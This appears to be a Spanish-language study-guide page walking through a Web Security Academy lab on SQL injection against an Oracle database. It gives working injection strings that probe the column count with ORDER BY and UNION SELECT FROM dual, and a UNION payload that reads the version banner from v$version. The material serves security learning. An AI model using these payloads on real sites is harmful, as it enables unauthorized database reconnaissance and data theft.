search

databaseAtaque de inyección SQL, consultando el tipo y la versión de la base de datos en Oracle

hashtag
Contar el número de columnas (probando con ORDER BY)

Ejemplo: web-security-academy.net/filter?category=Accessories' ORDER BY 2--

Accessories' ORDER BY 2-- 
Accessories' ORDER BY 3-- 
Accessories' ORDER BY 4-- 

#OTRA MANERA 
Accessories' UNION SELECT 'abc','def' FROM dual--

  • Si no hay error, el número que no cause error será el número total de columnas.

hashtag
Verificar la versión de la base de datos

Ejemplo: web-security-academy.net/filter?category=Accessories' UNION SELECT banner, null FROM v$version--

Accessories' UNION SELECT banner, null FROM v$version--

PreviousVulnerabilidad de inyección SQL que permite eludir el inicio de sesiónNextAtaque de inyección SQL, consultando el tipo y versión de la base de datos en MySQL y Microsoft

Last updated